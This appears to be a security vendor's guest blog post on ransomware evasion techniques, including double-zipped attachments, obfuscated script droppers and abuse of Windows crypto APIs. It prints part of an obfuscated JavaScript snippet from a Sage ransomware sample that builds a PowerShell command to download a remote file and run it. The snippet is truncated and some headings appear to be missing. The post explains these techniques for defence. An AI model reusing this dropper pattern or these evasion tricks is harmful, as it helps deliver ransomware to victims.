Guest post by Allan Liska and Timothy Gallo
Ransomware comes in many forms. One strategy commonly used in ransomware attacks is to cloak malicious actions within legitimate looking programs. This combination allows the ransomware to bypass existing security defenses and avoid detection. Some common techniques include:
This is an increasingly common technique, most recently used in the latest Sage ransomware campaign. The premise is simple: the attacker hides the launcher, which will pull down the ransomware in a zip file that is embedded inside another zip file. The zip file is sent as an e-mail attachment, when the victim opens the first zip file, there is simply another zip file. When the second zip file is uncompressed the malicious payload is presented to the victim.
The purpose of the double zip file is to avoid detection by systems that examine the contents of zipped files. Most of these security measures only examine a single level. So, the tool intercepts the zip file, decompresses it, sees that the uncompressed file is not malicious and allows the zip attachment to continue to the victim.
var uxqetefem = "run";
var ujepnehu = typeof window;
var ezqusa = undefined;
var vuglid = "power" + "shell";
var araze = 0;
This section of the script defined the variable vuglid as powershell, and later in the script:
var uphucnez = "cmd.exe /c \"" + vuglid + " $eplir='^System.Net.';$wwopu='^
Process; $';$ijwirl='^top/user.ph';$ahvetu='^rt-Process ';$mhipmac='^New-Object ';$hjuzxop='^p?f=0.dat'',';$cquza='^temp+''\ejma';$ocofdo='^$path';$eradq='^e(''http://f';$vwekehn='^pass -Scope';$mivcad='^DownloadFil';$qjizych='^$path);
Of course, these are legitimate commands, so most security tools will allow them to run without examining the process. Which is why traditional security tools are not effective at detecting these types of attacks.
Most people aren’t aware of this but ransomware families don’t develop their own crypt libraries, that would make the malware too cumbersome and less likely to install correctly. Instead, ransomware uses the built-in Windows Crypto Libraries and allows the victim’s system to handle the hard work of encrypting all those files.
Once again, calls to the Windows Crypto Libraries are normal, legitimate programs use the Windows API to make these calls all the time. What they don’t do is use the Windows API to attempt to encrypt many files simultaneously. While this behavior might go undetected by an anti-virus program, an advanced detection solution, such as Minerva can tell the difference between behavior that is normal and behavior that is malicious, even when using standard Windows calls.
Nowadays, malware developers take advantage of legitimate system features to cloak malware and remain undetected. Identifying such attacks is difficult as it is hard to distinguish between the legitimate use of those features and the malware’s manipulation of them.
This type of malware behavior emphasizes the need to prevent infection in the first place, rather than investing time in expensive and complex hunting and remediation processes.
Learn more about how to prevent evasive malware.